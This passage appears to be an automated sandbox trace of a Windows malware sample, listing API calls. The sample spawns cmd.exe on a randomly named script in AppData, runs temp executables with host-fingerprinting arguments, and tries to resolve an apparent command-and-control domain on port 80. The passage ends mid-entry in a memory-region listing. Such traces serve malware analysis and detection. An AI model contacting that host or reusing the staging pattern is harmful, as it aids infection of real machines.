[0108.821] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0108.822] CloseHandle (hObject=0xe8) returned 1 [0108.823] GetCurrentThreadId () returned 0xcb8 [0108.823] GetCurrentThreadId () returned 0xcb8 
[0108.823] GetCurrentThreadId () returned 0xcb8 [0108.823] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xccc, dwThreadId=0xcd0)) returned 1 [0108.832] CloseHandle (hObject=0xec) returned 1 [0108.832] CloseHandle (hObject=0xe8) returned 1 [0108.832] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 
[0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] WSACleanup () returned 0 [0108.883] FreeLibrary (hLibModule=0x77380000) returned 1 [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] GetCurrentProcess () returned 0xffffffff [0108.883] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0108.883] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] ResetEvent (hEvent=0x88) returned 1 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] ResetEvent (hEvent=0x88) returned 1 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] 
GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] CloseHandle (hObject=0x88) returned 1 [0108.884] CloseHandle (hObject=0x8c) returned 1 [0108.884] CloseHandle (hObject=0x84) returned 1 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 
wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) 
[0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.888] FreeLibrary (hLibModule=0x76910000) returned 1 [0108.888] LocalFree (hMem=0x2a4470) returned 0x0 [0108.888] FreeLibrary (hLibModule=0x76910000) returned 1 [0108.888] LocalFree (hMem=0x2a4460) returned 0x0 [0108.888] ExitProcess (uExitCode=0x0) Thread: id = 52 os_tid = 0xcbc [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", 
lpUsedDefaultChar=0x0) returned 21 [0108.652] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x18aed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0108.652] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x18afb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18afbac | out: ppResult=0x18afbac*=0x0) returned 11001 [0108.746] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x18afb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18afbac | out: ppResult=0x18afbac*=0x0) returned 11001 [0108.772] getnameinfo (in: pSockaddr=0x18afc14, SockaddrLength=0x0, pNodeBuffer=0x1340fec, NodeBufferSize=0x401, pServiceBuffer=0x1415124, 
ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0108.773] htons (hostshort=0x0) returned 0x0 [0108.773] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0108.773] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] SetEvent (hEvent=0x84) returned 1 [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] CloseHandle (hObject=0xb8) returned 1 [0108.773] RtlExitUserThread (Status=0x0) Thread: id = 54 os_tid = 0xcc8 Process: id = "34" image_name = "f8a3iwa6.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe" page_root = "0x7ea16900" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0xcac" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], 
"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5282 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5283 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5284 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 5285 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5286 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5287 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5288 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5289 start_va = 0x7ffde000 end_va = 